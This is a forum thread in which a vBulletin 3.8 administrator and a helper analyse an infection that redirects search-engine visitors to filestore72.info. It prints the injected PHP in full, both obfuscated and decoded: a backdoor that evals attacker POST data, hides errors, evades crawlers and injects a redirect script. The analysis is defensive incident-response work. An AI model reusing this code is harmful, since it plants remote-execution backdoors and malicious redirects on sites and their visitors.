vB 3.8 virus infection - How to remove filestore72.info

[Fynnon]

Hi, i got some people complaining that coming from google the forum redirects to filestore72.info


using

Code:

SELECT * FROM datastore WHERE data LIKE '%strtr%'

found something i can`t decipher so maybe someone in here could provide some assistance

PHP Code:

$vbulletin->templatecache['headinclude'].=fetch_template('activity_headinclude');



$pt = 'b6d38f1684e2389d8aa938bc5fbee5c6';
$arrvb = '30m%D2zm93h[,V3kRV3D>/e=>K%omJ=A+g}]*K%lEC+8zlX6m"=ogKJ[mgX6kB4jk7j<3Bq&E.VjmgX?zC)_gKJBkl=BkBk9T.jf>/eR>K&0+8=%k]>0k]T]#bL<*|8<+Or<k|X%V.4jg8~Nw8qz>/~6g7j<+g+rz.rO;gX%Xvq^+CJvzKq%E/X6k%=Bz|}&TB4jg8~Nw8qz>/~6g7j<En9jVn8Lk/>%+8=Q;gqvm.4]1K>0V/&AkC%j+g>x;|>rVK&xkK&8k]~x3")o+CJ[1Kj]#.q^w6J7JjJ7"BV1J)q}g8JnqJ>^}wV)n%}]g7jf>/T=}/~rk]X%g|JBz.4jg8X)w%+)w%9]7)qww)=7qw+)wjJ7>86<*Bq6NwLjk89]mC=AV.VV*BqBNw~?klJ]gK8rVCXRE.kvzC%K+J?o;K=Q^CV0zKV9+J?o^/%rmC=0g._x;l%o+B_vzK8x3")o+CJ[g._BVg&B;"8OzCJBg._BVg&O;"%jVJ?o^C+r;KJOzK=!g._xm"_AVC)]kl)Qg._xVC%o3gJBz)?o^C><V)?oz/jvm7k9>/}<^/?jVb6=>|}o;Kx]*BqRNwLjg8X)w%+)w%9]7)qww)=1n8Xw>86f>/L=}eXNn6Q>qJ=}wjJC7J4f>Ce=})q17JX^w6X77J~wNn6=>K8<kKT]*BqvN7q?#OV9;gX6Vl%Amg}]*BqoN7q?#OV9;"_]gK%j>A9j3n8Lz|>jEe+>neJ^JjJ7w6%NnOj:kr!D[|Z:Xnef>/R=+"8?V/jR>)=nqJ>"qJ>z>6rwJ)~^")=Xn8R]g7jf>CR=>A&A;|><k/}4V/%?+n6OVCJ[V.=I;g+rkKXBmg~61O~AklT=1Oko>/+OV"&9+gq<zO6:kr!D[|Z:z|~6m"=ok89];l>8kl?]g7[]#K8<kKTokCr?N|;=>B[jVl>8zC&%VC%o#n_0k/q<zK_A"BVAm"8?zCJK+g>Am"=o>86o>B+rzgLfm]T=m]TONv?0kKXBmg~6NOkfm";R+"8?V/jR>)=bn6=#7wJz>C_VE7%fm";R>Cel>l%AkKJ6E.q^q6Jw"BVK>86<>O;RmgXA+g}R>)=/qJqz>K<A>86<E7;lE.)%zg~6374jg6XNn6Q>qJ9j;86<E7%fm";R>/}=N7qREgQ<+O4j3O%A+gqvzK=!m"wR>C[9>KJo>B&6m"8%E.j!TA;?TbL<*BqQNgX8;]X6kOrQ+bwR>C4<#bL9*.jfk/><z]}R1lq0;|JQ+"_6#l&0;K)6m"=oN7VRV/q?*Ox0+l%9+gX6z|>%XA1om"_lzB=jz|VozC=r+._?m/L:kr!D[fZ:m"}=3BqQ^7kOEnQ=+gr<VbQ=m";RE.ejV7jl>OqBEgQ<+O4j37%f>eVTn6>~n)Xz>|q%zg~9;gq%gKr0zK9]gJ9]mCJr+C%o;K&8+CJ^ml)K;gXvkl%?V.VV#v6jmvQ=+"&A+g9jq6&N}j)Tw89]k|q_zCw]gJ9];|XA>86oN7qI*|8=^}ZZ`';
$ajx = ':eMx(UPoYL}O`I5&@|=XQ^sp4~1Tt*./+2>9j"7AmgKv#rZy8!Vwd[kqicnS6NhzD-a$R;ulF3,BG{?JWfCEb%]H0)_<';
$ajx2 = '.E[8/~?u#AQi;q-x|39Ntf&<gBIM,OCHZ@JskWSzaX2jLh)+1rdU`4cR:=T>0P6b($"%oY!m{e_y}]wV*7GKDln^vF5p';
$baseline = '%s%'.substr($arrvb, 733, 1);
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');
if($vbulletin->options['vbseostats']&&$vbulletin->options['vbseonavLink']){
  eval('$template_hook[navbar_buttons_left].="'.fetch_template('activity_navbar').'";');
}//endif($vbulletin->options['vbseonavLink'])


$vbulletin->templatecache['forumhome_lastpostby'] = $vbulletin->templatecache['colorsforusergroupinforumdisplay'] . $vbulletin->templatecache['forumhome_lastpostby']; 


[Replicant]

the strtr function in the $gpu line kicks out.

Code:

eval(@base64_decode(JHE9J2luaV9zZXQnO2lmKGZ1bmN0aW9uX2V4aXN0cygkcSkpeyRxKCdkaXNwbGF5X2Vycm9ycycsMCk7JHEoJ2xvZ19lcnJvcnMnLDApO31pZihpc3NldCgkX1BPU1RbJHB0XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHB0XSkpKTskdT1AcHJlZ19tYXRjaCgnI2JvdHxzcGlkZXJ8Y3Jhd2x8c2x1cnB8eWFuZGV4I2knLCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSk7JHM9QHBhcnNlX3VybCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pOyR0PUAkc1snaG9zdCddOyRyPUBwcmVnX21hdGNoKCcjbGl2ZVwuY29tfGdvb2dsZVwufHlhaG9vXC58YmluZy5jb218eWFuZGV4XC5ydXxyYW1ibGVyXC5ydXxiYWlkdVwufGZhY2Vib29rXC58aW5zdGFncmFtXC58dGlueXVybFwufGJpdFwubHkjaScsJHQpfHwkdD09J3QuY28nOyRoPUAkX1NFUlZFUlsnSFRUUF9IT1NUJ107JHA9QENPT0tJRV9QUkVGSVg7JGE9QFRISVNfU0NSSVBUPT09J21pc2MnOyRjPSRwLidsYXN0dmlzaXQnOyRuPSRwLidsYW5nX2lkJzskeT1Ab3JkKEZJTEVfVkVSU0lPTik.chr(43).NTE7JHo9ZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9NT1onXSk7JGo9JzxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9IicuJHZidWxsZXRpbi0.chr(43).b3B0aW9uc1snYmJ1cmwnXS4nL21pc2MucGhwP3Y9Jy4kdmJ1bGxldGluLT5vcHRpb25zWydzaW1wbGV2ZXJzaW9uJ10uJyZhbXA7anM9anMiPjwvc2NyaXB0Pic7aWYoZW1wdHkoJF9DT09LSUVbJG5dKSl7aWYoJGEmJmlzc2V0KCRfR0VUWyd2J10pJiYoaXNzZXQoJF9HRVRbJ2pzJ10pKSYmKCFlbXB0eSgkX0NPT0tJRVskY10pKSl7aWYoJHQ9PSRoKXtpZigkeilzZXRjb29raWUoJG4sJ2VuJyx0aW1lKCkrMzYwMDApOyRtPXN1YnN0cihtZDUoJGgpLDAsOCk7cHJpbnQoImRvY3VtZW50LmxvY2F0aW9uPSdodHRwOi8vZmlsZXN0b3JlNzIuaW5mby9kb3dubG9hZC5waHA.chr(47).aWQ9eyRtfSciKTt9ZXhpdDt9aWYoKCEkdSkmJiRyKXtpZigkeSl7JEdMT0JBTFNbJ3RlbXBsYXRlX2hvb2snXVsnaGVhZGluY2x1ZGVfamF2YXNjcmlwdCddLj0kajt9ZWxzZXskR0xPQkFMU1snc3R5bGUnXVsnY3NzJ10uPSRqO319fQ));

The editor won't let me post the decoded result, so I'll put it in picture form.

[Fynnon]

Thanks. From your code using this online tool https://www.samltool.com/base64.php i got:

PHP Code:

$q='ini_set';if(function_exists($q)){$q('display_errors',0);

$q('log_errors',0);}if(isset($_POST[$pt]))eval(base 64_decode(str_rot13($_POST[$pt])));

$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);

$s=@parse_url($_SERVER['HTTP_REFERER']);$t=@$s['host'];$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.|facebook\.|instagram\.|tinyurl\.|bit\.ly#i',$t)||$t=='t.co';

$h=@$_SERVER['HTTP_HOST'];$p=@COOKIE_PREFIX;$a=@THIS_SCRIPT==='misc';$c=$p.'lastvisit';$n=$p.'lang_id';

$y=@ord(FILE_VERSION)751;$z=empty($_SERVER['HTTP_X_MOZ']);$j='<script type="text/javascript" src="'.$vbulletin-7options['bburl'].'/misc.php?v='.$vbulletin->options['simpleversion'].'&amp;js=js"></script>';if(empty($_COOKIE[$n])){if($a&&isset($_GET['v'])&&(isset($_GET['js']))&&(!empty($_COOKIE[$c]))){if($t==$h){if($z)setcookie($n,'en',time()+36000);

$m=substr(md5($h),0,8);print("document.location='http://filestore72.info/download.php;id={$m}'");}exit;}if((!$u)&&$r){if($y){$GLOBALS['template_hook']['headinclude_javascript'].=$j;}else{$GLOBALS['style']['css'].=$j;}}} 


EDIT: still getting redirects